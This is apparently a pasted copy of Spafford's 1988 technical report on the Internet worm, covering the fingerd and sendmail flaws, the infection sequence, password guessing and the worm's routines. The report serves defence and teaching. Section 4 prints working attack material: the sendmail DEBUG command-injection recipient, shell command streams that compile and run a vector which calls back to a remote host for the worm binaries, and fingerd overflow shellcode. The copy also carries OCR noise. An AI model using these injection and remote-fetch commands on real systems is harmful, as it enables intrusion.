The Internet Worm Program: An Analysis, by Eugene H. Spafford

SUBMITTED BY: Guest
DATE: July 23, 2013, 7:28 p.m.
FORMAT: Text only
SIZE: 111.0 kB
Raw Download
HITS: 1477
Report
The Internet Worm Program: An Analysis 

Purdue Technical Report CSD-TR-823 

Eugene H. Spafford 
Department of Computer Sciences Purdue University 
West Lafayette, IN 47907-2004 

spaf@cs.purdue.edu 


ABSTRACT 
On the evening of 2 November 1988, someone infected the Internet 
with a worm program. That program exploited flaws in utility 
programs in systems based on BSD-derived versions of UNIX. The 
flaws allowed the program to break into those machines and copy 
itself, thus infecting those systems. This infection eventually 
spread to thousands of machines, and disrupted normal activities 
and Internet connectivity for many days. This report gives a 
detailed description of the components of the worm 
program\320data and functions. It is based on study of two 
completely independent reverse-compilations of the worm and a 
version disassembled to VAX assembly language. Almost no source 
code is given in the paper because of current concerns about the 
state of the ``immune system'' of Internet hosts, but the 
description should be detailed enough to allow the reader to 
understand the behavior of the program. The paper contains a 
review of the security flaws exploited by the worm program, and 
gives some recommendations on how to eliminate or mitigate their 
future use. The report also includes an analysis of the coding 
style and methods used by the author\(s\) of the worm, and draws 
some conclusions about his abilities and intent. 

Copyright 1988 by Eugene H. Spafford. All rights reserved. 

Permission is hereby granted to make copies of this work, without 
charge, solely for the purposes of instruction and research. Any 
such copies must include a copy of this title page and copyright 
notice. Any other reproduction, publication, or use is strictly 
prohibited without express written permission. November 29, 1988 

The Internet Worm Program: An Analysis 
Purdue Technical Report CSD-TR-823 
Eugene H. Spafford 
Department of Computer Sciences 
Purdue University West Lafayette, IN 47907-2004 

spaf@cs.purdue.edu 

Introduction 
On the evening of 2 November 1988 the Internet came under attack 
>From within. Sometime round 6 PM EST, a program was executed on 
one or more hosts connected to the Internet. This program 
collected host, network, and user information, then broke into 
other machines ???using flaws present in those systems' software. 
After breaking in, the program would replicate itself and the 
replica would also attempt to infect other systems. Although the 
program would only infect Sun Microsystems Sun 3 systems, and VAX 
computers running variants of 4 BSD UNIX the program spread 
quickly, as did the confusion and consternation of system 
administrators and users as they discovered that their systems 
had been infected. Although UNIX has long been known to have some 
security weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\), the 
scope of the breakins came as a great surprise to almost 
everyone. he program was mysterious to users at sites where it 
appeared. Unusual files were left in the usr/tmp directories of 
some machines, and strange messages appeared in the log files of 
some of the utilities, such as the sendmail mail handling agent. 
The most noticeable effect, however, was that systems became more 
and more loaded with running processes as they became repeatedly 
infected. As time went on, some of these machines became so 
loaded that they were unable to continue any processing; some 
machines failed completely when their swap space or process 
tables were exhausted. By late Thursday night, personnel at the 
University of California at Berkeley and at Massachusetts 
Institute of Technology had ``captured'' copies of the program 
and began to analyze it. People at other sites also began to 
study the program and were developing methods of eradicating it. 
A common fear was that the program was somehow tampering with 
system resources in a way that could not be readily detected and 
that while a cure was being sought, system files were being 
altered or information destroyed. By 5 AM EST Thursday morning, 
less than 12 hours after the infection started on the network, 
the Computer Systems Research Group at Berkeley had developed an 
interim set of steps to halt its spread. This included a 
preliminary patch to the sendmail mail agent, and the suggestion 
to rename one or both of the C compiler and loader to prevent 
their use. These suggestions were published in mailing lists and 
on the usenet, although their spread was hampered by systems 
disconnecting from the Internet to attempt a ``quarantine.'' 
By about 7 PM EST Thursday, another simple, effective method of 
stopping the infection, without renaming system utilities, was 
discovered at Purdue and also widely published. Software patches 
were posted by the Berkeley group at the same time to mend all 
the flaws that enabled the program to invade systems. All that 
remained was to analyze the code that caused the problems. On 
November 8, the National Computer Security Center held a 
hastily-convened workshop in Baltimore. The topic of discussion 
was the program and what it meant to the internet community. Who 
was at that meeting and why they were invited, and the topics 
discussed have not yet been made public. 

However, one thing we know that was decided by those present at 
the meeting was that they would not distribute copies of their 
reverse-engineered code to the general public. It was felt that 
the program exploited too many little-known techniques and that 
making it generally available would only provide other attackers 
a framework to build another such program. Although such a stance 
is well-intended, it can serve only as a delaying tactic. As of 
November 27, I am aware of at least five versions of the 
decompiled code, and because of the widespread distribution of 
the binary, I am sure there are at least ten times that many 
versions already completed or in progress and the required skills 
and tools are too readily available within the community to 
believe that only a few groups have the capability to reconstruct 
the source code. any system administrators, programmers, and 
managers are interested in how the program managed to establish 
itself on their systems and spread so quickly These individuals 
have  valid interest in seeing the code, especially if they are 
software vendors. Their interest is not to duplicate the program, 
but to be sure that all the holes used by the program are 
properly plugged. Furthermore, examining the code may help 
administrators and vendors develop defenses against future 
attacks, despite the claims to the contrary by some of the 
individuals with copies of the reverse-engineered code. This 
report is intended to serve an interim role in this process. It 
is a detailed description of how the program works, but does not 
provide source code that could be used to create a new worm 
program. As such, this should be an aid to those individuals 
seeking a better understanding of how the code worked, yet it is 
in such a form that it cannot be used to create a new worm 
without considerable effort. Section 3 and Appendix C contain 
specific observations about some of the flaws in the system 
exploited by the program, and their fixes. A companion report, to 
be issued in a few weeks, will contain a history of the worm's 
spread through the Internet. This analysis is the result of a 
study performed on three separate reverse-engineered versions of 
the worm code. Two of these versions are in C code, and one in 
VAX assembler. All three agree in all but the most minor details. 
One C version of the code compiles to binary that is identical to 
the original code, except for minor differences of no 
significance. As such, I can state with some certainty that if 
there was only one version of the worm program, then it was 
benign in intent. The worm did not write to the file system 
except when transferring itself into a target system. It also did 
not transmit any information from infected systems to any site, 
other than copies of the worm program itself. Since the Berkeley 
Computer Systems Research Group as already published official 
fixes to the flaws exploited by the program, we do not have to 
worry about these specific attacks being used again. Many vendors 
have also issued appropriate patches. It now remains to convince 
the remaining vendors to issue fixes, and users to install them. 

Terminology 

There seems to be considerable variation in the names applied to 
the program described in this paper. I use the term worm instead 
of virus based on its behavior. Members of the press have used 
the term virus, possibly because their experience to date has 
been only with that form of security problem. This usage has been 
reinforced by quotes from computer managers and programmers also 
unfamiliar with the terminology. For purposes of clarifying the 
terminology, let me define the difference between these two terms 
and give some citations to their origins:  worm is a program that 
can run by itself and can propagate a fully working version of 
itself to other machines. It is derived from the word tapeworm, a 
parasitic organism that lives inside a host and saps its 
resources to maintain itself.  virus is a piece of code that adds 
itself to other programs, including operating systems. it cannot 
run independently and it requires that its ``host'' program be 
run to activate it. As such, it has a clear analog to biological 
viruses and those viruses are not considered alive in  the usual 
sense; instead, they invade host cells and corrupt them, causing 
them to produce  new viruses.  The program that was loosed on the 
Internet was clearly a worm.  

2.1. Worms  

The concept of a worm program that spreads itself from machine to 
(machine was  apparently first described by John Brunner in 1975 
in his classic science fiction novel The Shockwave Rider. 
[Brun75]  He called these programs tapeworms that lived 
``inside'' the computers  and spread themselves to other 
machines. In 1979-1981, researchers at Xerox PARC built and  
experimented with worm programs. They reported their experiences 
in an article in 1982 in Communications of the ACM.  [Shoc82] The 
worms built at PARC were designed to travel from machine to 
machine and do useful  work in a distributed environment. They 
were not used at that time to break into systems,  although some 
did ``get away'' during the tests. A few people seem to prefer to 
call the Internet Worm a virus because it was destructive, and 
they believe worms are non-destructive. Not  everyone agrees that 
the Internet Worm was destructive, however. Since intent and 
effect are sometimes difficult to judge, using those as a naming 
criterion is clearly insufficient. As such, worm continues to be 
the clear choice to describe this kind of program.  

2.2. Viruses  

The first (use of the word virus \(to my knowledge\) to describe 
something that infects a  computer was by David Gerrold in his 
science fiction short stories about the G.O.D. machine.  These 
stories were later combined and expanded to form the book 
When Harlie Was One. [Gerr72] (A subplot in that book described a 
program named VIRUS created by an unethical scientist.  A  
computer infected with VIRUS would randomly dial the phone until 
it found another computer.  It  would then break into that system 
and infect it with a copy of VIRUS. This program would infiltrate 
the system software and slow the system down so much that it 
became unusable  except to infect other machines\). The inventor 
had plans to sell a program named VACCINE  that could cure VIRUS 
and prevent infection, but disaster occurred when noise on a 
phone line caused VIRUS to mutate so VACCINE ceased to be 
effective.  The term computer virus was first used in a formal 
way by Fred Cohen at USC. [Cohe84]  He  defined the term to mean 
a security problem that attaches itself to other code and turns 
it into  something that produces viruses; to quote from his 
paper: ``We define a computer `virus' as a  program that can 
infect other programs by modifying them to include a possibly 
evolved copy of itself.'' He claimed the first computer virus was 
``born'' on November 3, 1983, written by  himself for a security 
seminar course.  

The interested reader may also wish to consult [Denn88] and 
[Dewd85] for further discussion of the terms.  

3.  Flaws and Misfeatures  

3.1. Specific Problems  

The actions of the Internet Worm exposed some specific security 
flaws in standard services provided by BSD-derived versions of 
UNIX. Specific patches for these flaws have been widely 
circulated in days since the worm program attacked the Internet. 
Those flaws and patches are  discussed here.  

3.1.1. fingerd and gets  

The finger program is a utility that allows users to obtain 
information about other users. It  is usually used to identify 
the full name or login name of a user, whether or not a user is  
currently logged in, and possibly other information about the 
person such as telephone numbers  where he or she can be reached. 
The fingerd program is intended to run as a daemon, or background 
process, to service remote requests using the finger protocol.  
[Harr77]  The bug exploited to break fingerd involved overrunning 
the buffer the daemon used for  input. The standard C library has 
a few routines that read input without checking for bounds on  
the buffer involved. In particular, the gets call takes input to 
a buffer without doing any bounds  checking; this was the call 
exploited by the worm.  The gets routine is not the only routine 
with this flaw. The family of routines scanf/fscanf/sscanf may 
also overrun buffers when decoding input unless the user 
explicitly  specifies limits on the number of characters to be 
converted. Incautious use of the sprintf routine can overrun 
buffers. Use of the strcat/strcpy calls instead of the 
strncat/strncpy routines  may also overflow their buffers.  
Although experienced C programmers are aware of the problems with 
these routines, they  continue to use them. Worse, their format 
is in some sense codified not only by historical inclusion in 
UNIX and the C language, but more formally in the forthcoming 
ANSI language standard  for C. The hazard with these calls is 
that any network server or privileged program using  them may 
possibly be compromised by careful precalculation of the 
inappropriate input.  An important step in removing this hazard 
would be first to develop a set of replacement  calls that accept 
values for bounds on their program-supplied buffer arguments. 
Next, all system servers and privileged applications should be 
examined for unchecked uses of the original  calls, with those 
calls then being replaced by the new bounded versions. Note that 
this audit  has  already been performed by the group at Berkeley; 
only the fingerd and timed servers used the gets call, and 
patches to fingerd have already been posted. Appendix C contains 
a new  version of fingerd written specifically for this report 
that may be used to replace the original version. This version 
makes no calls to gets.  

3.1.2. Sendmail  

The sendmail program is a mailer designed to route mail in a 
heterogeneous internetwork.  [Allm83]  The program operates in a 
number of modes, but the one of most interest is  when it is 
operating as a daemon process. In this mode, the program is 
``listening'' on (a TCP  port \(#25\) for attempts to deliver 
mail using standard Internet protocols, principally SMTP  
\(Simple Mail Transfer Protocol\).  [Post82]  When such a request 
is detected, the daemon enters into  a dialog with the remote 
mailer to determine sender, recipient, delivery instructions, and 
message contents.  The bug exploited in sendmail had to do with 
functionality provided by a debugging  option in the code. The 
worm would issue the DEBUG command to sendmail and then specify  
a set of commands instead of a user address as the recipient of 
the message. Normally, this (is  not allowed, but it is present 
in the debugging code to allow testers to verify that mail is 
arriving at a particular site without the need to activate the 
address resolution routines. The debug  option of sendmail is 
often used because of the complexity of configuring the mailer 
for local  conditions, and many vendors and site administrators 
leave the debug option compiled in.  The sendmail program is of 
immense importance on most Berkeley-derived \(and other\) UNIX 
systems because it handles the complex tasks of mail routing and 
delivery. Yet, despite  its importance and wide-spread use, most 
system administrators (know little about how it works.  Stories 
are often related about how system administrators will attempt to 
write new device  drivers or otherwise modify the kernel of the 
OS, yet they will not willingly attempt to modify  sendmail or 
its configuration files.  It is little wonder, then, that bugs 
are present (in sendmail that allow unexpected behavior.  Other 
flaws have been found and reported now that attention has been 
focused on the program,  but it is not known for sure if all the 
bugs have been discovered and all the patches circulated.  One 
obvious approach would be to dispose of sendmail and come (up 
with a simpler program to handle mail. Actually, for purposes 
of verification, developing a suite of cooperating  programs 
would be a better approach, and more aligned with the UNIX 
philosophy. In effect,  sendmail is fundamentally flawed, not 
because of anything related to function, (but because it is  too 
complex and difficult to understand.  

The Berkeley Computer Systems Research Group has a new version of 
sendmail with  many bug fixes and fixes for security flaws. This 
version of sendmail is available for FTP from  the host 
``ucbarpa.berkeley.edu'' and will be present in the file 
~ftp/pub/sendmail.tar.Z by the  end of November 1988. Note that 
this version is shipped with the DEBUG option disabled by  
default. However, this does not help system administrators who 
wish to enable the DEBUG  option, although the researchers at 
Berkeley believe they have fixed (all the security flaws  
inherent in that facility. One approach that could be taken with 
the program would be to have it  prompt the user for the password 
of the super user \(root\) when the DEBUG command is given.  A 
static password should never be compiled into the program because 
(this would mean that the same password might be present at 
multiple sites and seldom changed.  For those sites without 
access to FTP or otherwise unable to obtain the new version, the  
official patches to sendmail are enclosed in Appendix D.  

3.2. Other Problems  

Although the worm exploited flaws in only two server programs, 
its behavior has served to  illustrate a few fundamental problems 
that have not yet been widely addressed. In the interest of  
promoting better security, some of these problems are discussed 
here. (The interested reader is  directed to works such as 
[Gram84] for a broader discussion of related issues.  

3.2.1. Servers in general  

A security flaw not exploited by the worm, but now becoming 
obvious, is that many system services have configuration and 
command files owned by the same userid. Programs like  sendmail, 
the at service, and other facilities are often all owned by the 
same (non-user id. This  means that if it is possible to abuse 
one of the services, it might be possible to abuse many.  One way 
to deal with the general problem is have every daemon and 
subsystem run with a  separate userid. That way, the command and 
data files for each subsystem could (be protected in  such a way 
that only that subsystem could have write \(and perhaps read\) 
access to the files.  This is effectively an implementation of 
the principle of least privilege. Although doing this  might add 
an extra dozen user ids to the system, it is a small (cost to 
pay, and is already sup ported in the UNIX paradigm. Services 
that should have separate ids include sendmail, news, at,  
finger, ftp, uucp and YP.  

3.2.2. Passwords  

A key attack of the worm program involved attempts to discover 
user passwords. It was  able to determine success because the 
encrypted password of each user was in a publicly readable file. 
This allows an attacker to encrypt lists of possible passwords 
and then compare  them against the actual passwords without 
passing through any system function. In effect, the  security of 
the passwords is provided in large part by the prohibitive effort 
of trying all combinations of letters. Unfortunately, as machines 
get faster, the cost of such attempts decreases.  Dividing the 
task among multiple processors further reduces the time needed to 
decrypt a password. It (is currently feasible to use a 
supercomputer to precalculate all probable passwords and store 
them on optical media. Although not \(currently\) portable, this 
scheme would allow someone with the appropriate resources access 
to any account for which they could read the password  field and 
then consult (their database of pre-encrypted passwords. As the 
density of storage  media increases, this problem will only get 
more severe.  A clear approach to reducing the risk of such 
attacks, and an approach that has already  been taken in some 
variants of UNIX, would be to have a (shadow) password file. The 
encrypted  passwords are saved in a file that is readable only by 
the system administrators, and a privileged  call performs 
password encryptions and comparisons with an appropriate delay 
\(.5 to 1 second,  for instance\). This would prevent any attempt 
to ``fish'' for passwords. Additionally, a threshold could be 
included to check for repeated password attempts from the same 
process, resulting  in some form of alarm being raised. Shadow 
password files should be used in combination with  encryption 
rather than in place of such techniques, however, or one problem 
is simply replaced  by a different one; the combination of the 
two methods is stronger than either one alone.  Another way to 
strengthen the password mechanism would be to change the utility 
that  sets user passwords. The utility currently makes minimal 
attempt to ensure that new passwords are nontrivial to guess. The 
program could be strengthened in such a way that it would reject 
any choice of a word currently in the on-line dictionary or based 
on the account name.  

4. High-Level Description of the Worm  

This section contains a high-level overview of how the worm 
program functions. The  description in this section assumes that 
the reader is familiar with UNIX and somewhat familiar  with 
network facilities under UNIX. Section 5 describes the individual 
functions and structures  in more detail.  The worm consists of 
two parts: a main program, and a bootstrap or vector program  
\(described in Appendix B\). We will start our description from 
the point at which a host is  about to be infected. At this 
point, a worm running on another machine has either succeeded in  
establishing a shell on the new host and has connected back to 
the infecting machine via a TCP  connection, or it has connected 
to the SMTP port and is transmitting to the sendmail program.  
The infection proceeded as follows:  1\) A socket was established 
on the infecting machine for the vector program to connect to  
\(e.g., socket number 32341\). A challenge string was constructed 
>From a random number  \(e.g., 8712440\). A file name base was 
also constructed using a random number \(e.g.,  14481910\).  2\) 
The vector program was installed and executed using one of two 
methods:  2a\) Across a TCP connection to a shell, the worm would 
send the following commands  \(the two lines beginning with 
``cc'' were sent as a single line\):  
PATH=/bin:/usr/bin:/usr/ucb  cd /usr/tmp  echo gorch49; sed '/int 
zz/q' > x14481910.c;echo gorch50  [text of vector 
program\320enclosed in Appendix B]  int zz;  cc (-o x14481910 
x14481910.c;./x14481910 128.32.134.16 32341 8712440;  rm -f 
x14481910 x14481910.c;echo DONE  
Then it would wait for the string ``DONE'' to signal that the 
vector program was  running.  2b\) Using the SMTP connection, it 
would transmit \(the two lines beginning with ``cc''  were sent 
as a single line\):  
debug  mail from: </dev/null>  rcpt to: <"|sed -e '1,/^$/'d | 
/bin/sh ; exit 0">  data  cd /usr/tmp  cat > x14481910.c <<'EOF'  
[text of vector program\320enclosed in Appendix III]  EOF  cc -o 
x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;  rm 
-f x14481910 x14481910.c .   quit  

The infecting worm would then wait for up to 2 minutes on 
the designated port for the vector to contact it.  3\) The vector 
program then connected to the ``server,'' sent the challenge 
string, and  transferred three files: a Sun 3 binary version of 
the worm, a VAX version, and the source  code for the vector 
program. After the files were copied, the running vector program  
became \(via the execl call\) the shell with its input and output 
still connected to the server  worm.  4\) The server worm sent 
the following command stream to the connected shell:  
PATH=/bin:/usr/bin:/usr/ucb  rm -f sh  if [ -f sh ]  then  
P=x14481910  else  P=sh  fi  
Then, for each binary file it had transferred \(just two in this 
case, although the code is  written (to allow more\), it would 
send the following form of command sequence:  
cc -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.o 
x14481910,vax.o x14481910,l1.c  rm -f $P  
The rm would succeed only if the linked version of the worm 
failed to start execution. If  the server determined that the 
host was now infected, it closed the connection. Otherwise,  it 
would try the other binary file. After both binary files had been 
tried, it would send over rm commands for the object files to 
clear away all evidence of the attempt at infection.  5\) The new 
worm on the infected host proceeded to ``hide'' itself by 
obscuring its argument  vector, unlinking the binary version of 
itself, and killing its parent \(the $$ argument in the  
invocation\). It then read into memory each of the worm binary 
files, encrypted each file  after reading it, and deleted the 
files from disk.  6\) Next, the new worm gathered information 
about network interfaces and hosts to which the  local machine 
was connected. It built lists of these in memory, including 
information  about canonical and alternate names and addresses. 
It gathered some of this information  by making direct 
ioctl calls, and by running the netstat program with various 
arguments.  It also read through various system files looking for 
host names to add to its database.  7\) It randomized the lists 
it constructed, then attempted to infect some of those hosts. For  
directly connected networks, it created a list of possible host 
numbers and attempted to infect those hosts if they existed. 
Depending on the type of host \(gateway or local network\), the 
worm first tried to establish a connection on the telnet or rexec 
ports to determine reachability before it attempted one of the 
infection methods.  8\) The infection attempts proceeded by one 
of three routes: rsh, fingerd, or sendmail.  8a\) The attack via 
rsh was done by attempting to spawn a remote shell by invocation 
of  \(in order of trial\) /usr/ucb/rsh, /usr/bin/rsh, and 
/bin/rsh. If successful, the host was  infected as in steps 1 and 
2a, above.  8b\) The attack via the finger daemon was somewhat 
more subtle. A connection was  established to the remote finger 
server daemon and then a specially constructed  string of 536 
bytes was passed to the daemon, overflowing its input buffer and 
overwriting parts of the stack. For standard 4 BSD versions 
running on VAX computers, the overflow resulted in the return 
stack frame for the main routine being  changed so that the 
return address pointed into the buffer on the stack. The 
instructions that were written into the stack at that location 
were:  pushl $68732f '/sh\\0'  pushl $6e69622f '/bin'  movl sp, 
r10  pushrl $0  pushrl $0  pushrl r10  pushrl $3  movl sp,ap  
chmk $3b  That (is, the code executed when the main routine 
attempted to return was:  execve\("/bin/sh", 0, 0\)  On VAXen, 
this resulted in the worm connected to a remote shell via the TCP 
connection. The worm then proceeded to infect the host as in 
steps 1 and 2a, (above.  On Suns, this simply resulted in a core 
file since the code was not in place to corrupt  a Sun version of 
fingerd in a similar fashion.  8c\) The worm then tried to infect 
the remote host by establishing a connection to the  SMTP port 
and mailing an (infection, as in step 2b, above.  Not all the 
steps were attempted. As soon as one method succeeded, the host 
entry in the internal list was marked as infected and the other 
methods were not attempted.  9\) Next, it entered a state machine 
consisting of five states. Each state (was run for a short  
while, then the program looped back to step #7 \(attempting to 
break into other hosts via sendmail, finger, or rsh \). The first 
four of the five states were attempts to break into user  
accounts on the local machine. The fifth state was the final 
state, and occurred after all  attempts had been made to break 
all passwords. In the fifth state, the worm looped forever  
trying to infect hosts in its internal tables and marked as not 
yet infected. The four states  were:  9a\) The worm read through 
the /etc/hosts.equiv files and /.rhosts files to find the names 
of equivalent hosts. These were marked in the internal table of 
hosts. Next, the  worm read the /etc/passwd file into an internal 
data structure. As it was doing this, it  also examined 
the .forward file in each user home directory and included those 
host  names in its internal table of hosts to try. Oddly, it did 
not similarly check user .rhosts files.  9b\) The worm attempted 
to break each user password using simple choices. The worm  
checked the obvious case of no password. Then, it used the 
account name and  GECOS field to try simple passwords. Assume 
that the user had an entry in the  password file like:  
account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh  then 
the words tried as potential passwords would be account, 
accountaccount, User,  Name, user, name, and tnuocca. These are, 
respectively, the account name, the  account name concatenated 
with itself, the first and last names of the user, the user  
names with leading capital letters turned to lower case, and the 
account name  reversed. Experience described in [Gram84] 
indicates that on systems where users are naive about password 
security, these choices may work for up to 30% of user passwords.  
Step 10 in this section describes what was done if a password 
``hit'' was achieved.  9c\) The third stage in the process 
involved trying to break the password of each user by  trying 
each word present in an internal dictionary of words \(see 
Appendix I\). This  dictionary of 432 words was tried against 
each account in a random order, with  ``hits'' being handled as 
described in step 10, below.  9d\) The fourth stage was entered 
if all other attempts failed. For each word in the file  
/usr/dict/words, the worm would see if it was the password to any 
account. In addition, if the word in the dictionary began with an 
upper case letter, the letter was converted to lower case and 
that word was also tried against all the passwords.  10\) Once a 
password was broken for any account, the worm would attempt to 
break into  remote machines where that user had accounts. The 
worm would scan the .forward and .rhosts files of the user at 
this point, and identify the names of remote hosts that had  
accounts used by the target user. It then attempted two attacks:  
10a\) The worm would first attempt to create a remote shell using 
the rexec service. The  attempt would be made using the account 
name given in the .forward or .rhosts file  and the user's local 
password. This took advantage of the fact that users often have  
the same password on their accounts on multiple machines.  10b\) 
The worm would do a rexec to the current host \(using the local 
user name and password\) and would try a rsh command to the 
remote host using the username taken  from the file. This attack 
would succeed in those cases where the remote machine  had a 
hosts.equiv file or the user had a .rhosts file that allowed 
remote execution  without a password.  If the remote shell was 
created either way, the attack would continue as in steps 1 and 
2a,  above. No other use was made of the user password.  
Throughout the execution of the main loop, the worm would check 
for other worms running on the same machine. To do this, the worm 
would attempt to connect to another worm on  a local, 
predetermined TCP socket.  
9  
If such a connection succeeded, one worm would \(randomly\) set its 
pleasequit variable to 1, causing that worm to exit after it had 
reached partway  into the third stage of password cracking. This 
delay is part of the reason many systems had  multiple worms 
running: even though a worm would check for other local worms, it 
would  defer its self-destruction until significant effort had 
been made to break local passwords.  One out of every seven worms 
would become immortal rather than check for other local  worms. 
This was probably done to defeat any attempt to put a fake worm 
process on the TCP  port to kill existing worms. It also 
contributed to the load of a machine once infected.  The worm 
attempted to send an UDP packet to the host ernie.berkeley.edu  
10  
approximately once every 15 infections, based on a random number 
comparison. The code to do this  was incorrect, however, and no 
information was ever sent. Whether this was the intended ruse  or 
whether there was actually some reason for the byte to be sent is 
not currently known. However, the code is such that an 
uninitialized byte is the intended message. It is possible that 
the  author eventually intended to run some monitoring program on 
ernie \(after breaking into an account, no doubt\). Such a 
program could obtain the sending host number from the single-byte 
message, whether it was sent as a TCP or UDP packet. However, no 
evidence for such a program has been found and it is possible 
that the connection was simply a feint to cast suspicion  on 
personnel at Berkeley.  The worm would also fork itself on a 
regular basis and kill its parent. This served two  purposes. 
First, the worm appeared to keep changing its process id and no 
single process accumulated excessive amounts of cpu time. 
Secondly, processes that have been running for a long  time have 
their priority downgraded by the scheduler. By forking, the new 
process would  regain normal scheduling priority. This mechanism 
did not always work correctly, either, as we  locally observed 
some instances of the worm with over 600 seconds of accumulated 
cpu time.  If the worm ran for more than 12 hours, it would flush 
its host list of all entries flagged as  being immune or already 
infected. The way hosts were added to this list implies that a 
single  worm might reinfect the same machines every 12 hours.  

5. A Tour of the Worm  

The following is a brief, high-level description of the routines 
present in the worm code.  The description covers all the 
significant functionality of the program, but does not describe 
all  the auxiliary routines used nor does it describe all the 
parameters or algorithms involved. It  should, however, give the 
user a complete view of how the worm functioned.  

5.1. Data Structures  

The worm had a few global data structures worth mentioning. 
Additionally, the way it  handled some local data is of interest.  

5.1.1. Host list  

The worm constructed a linked list of host records. Each record 
contained an array of 12  character pointers to allow storage of 
up to 12 host names/aliases. Each record also contained  an array 
of six long unsigned integers for host addresses, and each record 
contained a flag field.  The only flag bits used in the code 
appear to be 0x01 \(host was a gateway\), 0x2 \(host has been  
infected\), 0x4 \(host cannot be infected \320 not reachable, not 
UNIX, wrong machine type\), and  0x8 \(host was ``equivalent'' in 
the sense that it appeared in a context like .rhosts file\).  

5.1.2. Gateway List  

The worm constructed a simply array of gateway IP addresses 
through the use of the system netstat command. These addresses 
were used to infect directly connected networks. The  use of the 
list is described in the explanation of scan_gateways and 
rt_init, below.  

5.1.3. Interfaces list  

An array of records was filled in with information about each 
network interface active on  the current host. This included the 
name of the interface, the outgoing address, the netmask, the  
destination host if the link was point-to-point  
11  
, and the interface flags.  


5.1.4. Pwd  

A linked list of records was built to hold user information. Each 
structure held the  account name, the encrypted password, the 
home directory, the gecos field, and a link to the  next record. 
A blank field was also allocated for decrypted passwords as they 
were found.  

5.1.5. objects  

The program maintained an array of ``objects'' that held the 
files that composed the worm.  Rather than have the files stored 
on disk, the program read the files into these internal 
structures.  Each record in the list contained the suffix of the 
file name \(e.g., ``sun3.o''\), the size of the file,  and the 
encrypted contents of the file. The use of this structure is 
described below.  

5.1.6. Words  

A mini-dictionary of words was present in the worm to use in 
password guessing \(see  Appendix A\). The words were stored in 
an array, and every word was masked \(XOR\) with the  bit pattern 
0x80. Thus, the dictionary would not show up with an invocation 
of the strings program on the binary or object files.  

5.1.7. Embedded Strings  

Every text string used by the program, without exception, was 
masked \(XOR\) with the bit  pattern 0x81. Every time a string 
was referenced, it was referenced via a call to XS. The XS 
function decrypted the requested string in a static circular 
buffer and returned a pointer to the  decrypted version. This 
also kept any of the text strings in the program from appearing 
during  an invocation of strings. Simply clearing the high order 
bit \(e.g., XOR 0x80\) or displaying the  program binary would 
not produce intelligible text. All references to XS have been 
omitted  from the following text; realize that every string was 
so encrypted.  It is not evident how the strings were placed in 
the program in this manner. The masked strings were present 
inline in the code, so some preprocessor or a modified version of 
the compiler must have been used. This represents a significant 
effort by the author of the worm, and suggests quite strongly 
that the author wanted to complicate or prevent the analysis of 
the program once it was discovered. 

5.2. Routines 

The descriptions given here are arranged in alphabetic order. The 
names of some routines are exactly as used by the author of the 
code. Other names are based on the function of the routine, and 
those names were chosen because the original routines were 
declared static and name information was not present in the 
object files. If the reader wishes to trace the functional \257ow 
of the worm, begin with the descriptions of routines main and 
doit \(presented first for this reason\). By function, the 
routines can be \(arbitrarily\) grouped as follows: setup and 
utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host, 
h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor, 
permute, rt_init, supports_rsh, and supports_telnet. network & 
password attacks : attack_network, attack_user, crack_0, crack_1, 
crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect, 
scan_gateways, sendworm, try_fingerd, try_password, try_rsh, 
try_sendmail, and waithit. camouflage: checkother, other_sleep, 
send_message, and xorbuf. 

5.2.1. main 

This was where the program started. The first thing it did was 
change its argument vector to make it look like it was the shell 
running. Next, it set its resource limits so a failure would not 
drop a core file. Then it loaded all the files named on the 
command line into the object structure in memory using calls to 
loadobject. If the file was not one of the objects loaded, the 
worm would immediately call exit. Next, the code unlinked all the 
object files, the file named sh \(the worm itself\), and the file 
/tmp/.dumb \(apparently a remnant of some earlier version of the 
program, possibly used as a restraint or log during 
testing\320the file is not otherwise referenced\). The program 
then finished zeroing out the argument vector. Next, the code 
would call if_init. If no interfaces were discovered by that 
routine, the program would call exit. The program would then get 
its current process group. If the process group was the same as 
its parent process id \(passed on the command line\), it would 
reset its process group and send a KILL signal to its parent. 
Last of all, the routine doit was invoked. 

5.2.2. doit 

This was the main worm code. First, a variable was set to the 
current time with a call to time, and the random number generator 
was initialized with the return value. Next, the routines hg and 
hl were invoked to infect some hosts. If one or both of these 
failed to infect any hosts, the routine ha was invoked. Next, the 
routine checkother was called to see if other worms were on this 
host. The routine send_message was also called to cast suspicion 
on the folks at Berkeley. 

12 
The code then entered an infinite loop: A call would be made to 
cracksome followed by a call to other_sleep with a parameter of 
30. Then cracksome would be called again. At this point, the 
process would fork itself, and the parent would exit, leaving the 
child to continue. Next, the routines hg, ha, and hi would all be 
called to infect other hosts. If any one \(or combination\) of 
these routines failed to infect a new host, the routine hl would 
be called to infect a local host. Thus, the code was aggressive 
about always infecting at least one host each pass through this 
loop. The logic here was faulty, however, because if all known 
gateway hosts were infected, or a bad set of host numbers were 
tried in ha, this code would call hl every time through the loop. 
Such behavior was one of the reasons hosts became overloaded with 
worm processes: every pass through the loop, each worm would 
likely be forced to infect another local host. Considering that 
multiple worms could run on a host for some time before one would 
exit, this could lead to an exponential growth of worms in a LAN 
environment. Next, the routine other_sleep was called with a 
timeout of 120. A check was then made to see if the worm had run 
for more than 12 hours. If so, a call was made to h_clean. 
Finally, a check was made of the pleasequit and nextw variables 
\(set in other_sleep or checkother, and crack_2, respectively\).  
If pleasequit was nonzero, and nextw was greater than 10, the 
worm would exit. 

5.2.3. attack_network 

This routine was designed to infect random hosts on a subnet. 
First, for each of the network interfaces, if checked to see if 
the target host was on a network to which the current host was 
directly connected. If so, the routine immediately returned. 
13 
Based on the class of the netmask \(e.g., Class A, Class B\), the 
code constructed a list of likely network numbers. A special 
algorithm was used to make good guesses at potential Class A host 
numbers. All these constructed host numbers were placed in a 
list, and the list was then randomized using permute. If the 
network was Class B, the permutation was done to favor low-
numbered hosts by doing two separate permutations\320the first 
six hosts in the output list were guaranteed to be chosen from 
the first dozen \(low-numbered\) host numbers generated. The 
first 20 entries in the permuted list were the only ones 
examined. For each such IP address, its entry was retrieved from 
the global list of hosts \(if it was in the list\). If the host 
was in the list and was marked as already infected or immune, it 
was ignored. Otherwise, a check was made to see if the host 
